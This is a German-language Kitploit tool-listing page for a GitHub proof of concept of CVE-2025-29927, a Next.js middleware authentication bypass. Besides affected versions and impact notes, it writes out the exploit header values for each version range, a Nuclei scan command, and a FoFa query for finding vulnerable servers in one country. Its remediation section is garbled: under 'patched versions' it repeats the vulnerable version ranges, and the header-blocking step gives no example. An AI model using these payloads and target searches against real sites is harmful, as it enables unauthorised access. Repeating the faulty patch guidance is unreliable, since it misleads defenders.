Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-29927 — CVE-2025-29927: Next.js Middleware-Umgehungs-Schwachstelle | Kitploit
Tools/GitHubGitHub/kh4sh3i/cve-2025-29927
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubkh4sh3i/cve-2025-29927

CVE-2025-29927

CVE-2025-29927: Next.js Middleware-Umgehungs-Schwachstelle

Repository anzeigen
24vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen



CVE-2025-29927

CVE-2025-29927: Next.js Middleware-Bypass-Schwachstelle Dieses Repository demonstriert die Schwachstelle CVE-2025-29927 in Next.js, bei der der interne Header x-middleware-subrequest verwendet werden kann, um Middleware-Überprüfungen wie die Authentifizierung zu umgehen.

Betroffene Versionen

root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9

Abhilfe und Behebung

  • Aktualisieren Sie Next.js auf die gepatchten Versionen:
root@kitploit:~
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
  • Falls ein Upgrade nicht sofort möglich ist, blockieren oder entfernen Sie den Header x-middleware-subrequest auf Webserver- oder Proxy-Ebene:

Auswirkungsszenarien

  • Autorisierungsumgehung: Angreifer können geschützte Routen ohne ordnungsgemäße Authentifizierung oder Autorisierung erreichen.
  • Umgehung der Content Security Policy (CSP): Wenn CSP-Header über die Middleware hinzugefügt werden, können Angreifer diese Sicherheitskontrollen umgehen und möglicherweise Cross-Site-Scripting (XSS)-Angriffe ermöglichen.
  • Denial-of-Service durch Cache-Vergiftung: In bestimmten Konfigurationen können Angreifer Caches mit nicht autorisierten Inhalten vergiften, indem sie Middleware umgehen, die Cache-Control-Header setzt.

Verwendung der NextJS-CVE-2025-29927 Nuclei-Vorlage

root@kitploit:~
nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr

Ausnutzung in verschiedenen Next.js-Versionen

  • Für Versionen vor 12.2:
root@kitploit:~
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: pages/dashboard/_middleware
x-middleware-subrequest: pages/dashboard/panel/_middleware
  • Für Versionen 12.2 und später:
root@kitploit:~
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
  • Für Versionen 13.2.0 und später:
root@kitploit:~
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware

Zielsuche mit FoFa

root@kitploit:~
header="x-middleware-rewrite" && country="IR"

Kostenloser CTF hierzu

  • CTF
Tool herunterladen